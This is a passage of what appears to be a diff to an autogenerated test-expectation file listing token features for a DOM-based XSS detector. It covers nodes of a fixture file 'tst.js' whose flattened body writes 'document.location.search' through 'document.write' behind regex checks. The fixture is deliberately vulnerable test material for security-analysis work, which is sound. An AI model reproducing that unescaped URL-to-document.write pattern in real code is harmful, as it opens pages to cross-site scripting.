URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:12 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:12 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:18 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:18 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:18 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:18 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:18 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:119:5:119:21 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:119:14:119:18 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:119:14:119:18 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:119:14:119:18 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:119:14:119:18 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:119:14:119:18 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16476,6 +114609,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:119:20:119:20 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:7 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:7 | v | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:7 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:7 | v | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:7 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:13 | v.match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:13 | v.match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:13 | v.match | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:13 | v.match | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:13 | v.match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | exceptional return of v.match(/^\\d+$/) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | exceptional return of v.match(/^\\d+$/) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | exceptional return of v.match(/^\\d+$/) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | exceptional return of v.match(/^\\d+$/) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | exceptional return of v.match(/^\\d+$/) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | v.match(/^\\d+$/) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | v.match(/^\\d+$/) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | v.match(/^\\d+$/) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | v.match(/^\\d+$/) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:122:7:122:22 | v.match(/^\\d+$/) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:122:9:122:13 | match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:122:9:122:13 | match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:122:9:122:13 | match | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:122:9:122:13 | match | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:122:9:122:13 | match | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | CalleeFlexibleAccessPath | v.match | | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16484,6 +114642,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:122:15:122:21 | /^\\d+$/ | receiverName | v | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:14 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:14 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:14 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:14 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:14 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:20 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:20 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:20 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:20 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:20 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:124:7:124:23 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:124:16:124:20 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:124:16:124:20 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:124:16:124:20 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:124:16:124:20 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:124:16:124:20 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16492,6 +114675,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:124:22:124:22 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:7 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:7 | v | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:7 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:7 | v | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:7 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:13 | v.match | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:13 | v.match | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:13 | v.match | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:13 | v.match | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:13 | v.match | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | exceptional return of v.match("^\\\\d+$") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | exceptional return of v.match("^\\\\d+$") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | exceptional return of v.match("^\\\\d+$") | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | exceptional return of v.match("^\\\\d+$") | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | exceptional return of v.match("^\\\\d+$") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:127:7:127:23 | v.match("^\\\\d+$") | contextFunctionInterfaces | 